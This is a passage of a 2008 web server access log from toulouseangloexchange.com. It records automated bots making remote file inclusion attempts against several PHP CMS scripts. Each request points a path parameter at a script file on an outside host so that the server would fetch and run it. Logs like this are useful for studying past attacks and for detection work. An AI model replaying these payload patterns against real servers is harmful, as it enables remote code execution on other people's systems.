200.170.201.136 - - [09/Mar/2008:20:02:18 -0700] "GET /logs/access_080128.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fuckerboy.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.170.201.136 - - [09/Mar/2008:20:02:47 -0700] "GET /logs/access_071210.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.fuckerboy.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.170.201.136 - - [09/Mar/2008:20:02:47 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.fuckerboy.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.170.201.136 - - [09/Mar/2008:20:02:48 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.fuckerboy.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
78.108.81.71 - - [09/Mar/2008:20:02:54 -0700] "GET /logs/access_080127.log/?mosConfig_absolute_path=http://www.eq2arena.com/content/data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
78.108.81.71 - - [09/Mar/2008:20:02:54 -0700] "GET /logs/?mosConfig_absolute_path=http://www.eq2arena.com/content/data1/alba.txt?? HTTP/1.1" 200 4227 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
61.67.120.48 - - [09/Mar/2008:20:03:02 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
78.108.81.71 - - [09/Mar/2008:20:03:26 -0700] "GET /logs/access_071119.log/?mosConfig_absolute_path=http://www.eq2arena.com/content/data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
60.249.42.221 - - [09/Mar/2008:20:04:08 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
200.170.201.136 - - [09/Mar/2008:20:04:52 -0700] "GET /logs/access_071203.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.fuckerboy.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.218.85.18 - - [09/Mar/2008:20:05:11 -0700] "GET /logs/access_071112.log//skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [09/Mar/2008:20:05:11 -0700] "GET //skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [09/Mar/2008:20:05:12 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
61.67.120.48 - - [09/Mar/2008:20:05:31 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
60.249.45.142 - - [09/Mar/2008:20:05:36 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
60.249.45.142 - - [09/Mar/2008:20:05:47 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.218.85.18 - - [09/Mar/2008:20:06:32 -0700] "GET /logs/access_071224.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [09/Mar/2008:20:06:33 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [09/Mar/2008:20:06:33 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
60.249.45.142 - - [09/Mar/2008:20:06:35 -0700] "GET /index.php?body=http://www.visit